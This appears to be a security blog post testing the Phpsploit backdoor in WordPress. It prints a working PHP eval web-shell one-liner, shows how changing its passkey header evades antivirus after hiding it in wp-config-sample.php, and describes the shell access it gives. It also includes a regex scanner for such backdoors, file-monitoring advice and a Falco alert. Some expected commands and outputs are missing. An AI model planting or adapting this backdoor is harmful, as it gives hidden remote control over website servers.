Backdooring WordPress with Phpsploit

As many of you know, WordPress is written in PHP. Finding backdoors in PHP and WordPress code can be quite tricky and sometimes almost impossible, since a backdoor can be hidden anywhere in the code, can look like regular code with ordinary human coding errors, and a standard installation of WordPress consists of about 432,709 lines of PHP code.

So instead of reading all the code and looking for backdoors by hand, we could use automated tools such as antivirus software; a popular open-source antivirus engine is ClamAV.

Today we are going to test the offensive Command and Control (C2) software Phpsploit, described as follows on its GitHub page:

PhpSploit is a remote control framework, aiming to provide a stealth interactive shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable of maintaining access to a compromised web server for privilege escalation purposes.

When you run Phpsploit and generate a standard backdoor to place in WordPress or other PHP code, it looks like this:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

The above code can be generated by running the following command:

./phpsploit --interactive --eval "backdoor"

If we insert this little eval snippet into a WordPress PHP file and upload the file to VirusTotal, the detection rate looks like this for the 58 antivirus scanners currently online:

[Image: VirusTotal Phpsploit]

Just one hit: ClamAV detects the backdoor as Php.Trojan.PhpSploit-7157376-0.

If we then run phpsploit again and set another PASSKEY like this:

The backdoor code also looks different:

<?php @eval($_SERVER['HTTP_LFN2DZLOE']); ?>

If we then hide this code in wp-config-sample.php and upload the file to VirusTotal again:

[Image: VirusTotal bypass]

Great! By making just a small change we now bypass all the malware engines listed at VirusTotal. Installing the backdoor is outside the scope of this blog post, but one of many possible routes is a vulnerable version of a plugin.
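The VirusTotal result above shows that a signature keyed on the header name HTTP_PHPSPL01T is defeated by changing the PASSKEY. As an added example (not code from the post or from the Phpsploit project), the small Python scanner below instead flags the pattern of a code-execution sink fed directly from request-controlled input, so the header name does not matter; the sample files and their paths are constructed for the demo.

```python
import re
from pathlib import Path

# Constructed sample files: the two Phpsploit backdoor variants shown in the post
# (default and changed PASSKEY header name), one benign $_SERVER use that only
# mentions eval in a comment, and a classic assert() web shell variant.
SAMPLE_FILES = {
    "index.php": "<?php @eval($_SERVER[\"HTTP_PHPSPL01T\"]); ?>\n",
    "wp-config-sample.php": "<?php\n/* config */\n@eval($_SERVER['HTTP_LFN2DZLOE']); ?>\n",
    "functions.php": "<?php $host = $_SERVER['HTTP_HOST']; // eval is not called here\n",
    "uploads/cache.php": "<?php assert(base64_decode($_POST['p'])); ?>\n",
}

# Functions that execute a string as PHP code (the "sink").
SINKS = r"(?:eval|assert|create_function)"
# Zero or more decoding wrappers placed between the sink and the input.
DECODERS = r"(?:(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(\s*)*"
# Request-controlled input (the "source"); any key is accepted, so renaming the
# HTTP_* header, as the PASSKEY change does, makes no difference to the match.
SOURCES = r"\$_(?:SERVER|REQUEST|GET|POST|COOKIE)\s*\[\s*['\"]?\w+['\"]?\s*\]"

TAINTED_SINK = re.compile(rf"\b{SINKS}\s*\(\s*{DECODERS}{SOURCES}", re.IGNORECASE)


def scan_php(source: str) -> list[str]:
    """Return every sink(...request input...) fragment found in PHP source text."""
    return [m.group(0) for m in TAINTED_SINK.finditer(source)]


def scan_files(files: dict[str, str]) -> dict[str, list[str]]:
    """Scan an in-memory {path: source} mapping; only flagged files are returned."""
    return {path: hits for path, src in files.items() if (hits := scan_php(src))}


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Scan every *.php file under a web root on disk (e.g. /var/www/html)."""
    found = {}
    for path in root.rglob("*.php"):
        hits = scan_php(path.read_text(errors="replace"))
        if hits:
            found[str(path)] = hits
    return found


if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(f"{path}: {hits}")
```

A match inside a comment is still reported on purpose; a reviewer can dismiss it faster than a missed backdoor can be found.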

As soon as the backdoor is in place, we can use it with set TARGET and exploit and then obtain a shell:

Great. We can now start local Linux reconnaissance to look for privilege escalation vulnerabilities with commands like whoami, ls and pwd:

At the network level, the PHP code being sent over the wire looks like the capture below. It should be fairly easy to trigger IDS alerts on this traffic, since PHP code such as eval and base64_decode should never be part of an HTTP header. Of course this can also be changed in Phpsploit with the command set REQ_HEADER_PAYLOAD.

But running Suricata with updated rules found nothing:


Conclusions

Even with small modifications to the PHP backdoor code provided by Phpsploit, it is hard for antivirus software to find the backdoor. The best defense is to monitor all changes in the www folder with open-source tools like OSSEC or Wazuh.

When running Sysdig Falco while Phpsploit is used, the following log entry shows up: "Debug Shell spawned by untrusted binary"

syslog:Mar 23 17:18:04 vagrant falco: 17:18:04.781532982: Debug Shell spawned by untrusted binary (user=vagrant shell=sh parent=apache2 cmdline=sh -c echo $HOME pcmdline=apache2 -k start gparent=apache2 ggparent=systemd aname[4]=<NA> aname[5]=<NA> aname[6]=<NA> aname[7]=<NA> container_id=host image=<NA>)

Read more about how to find backdoors with Sysdig Falco in our blog post here.
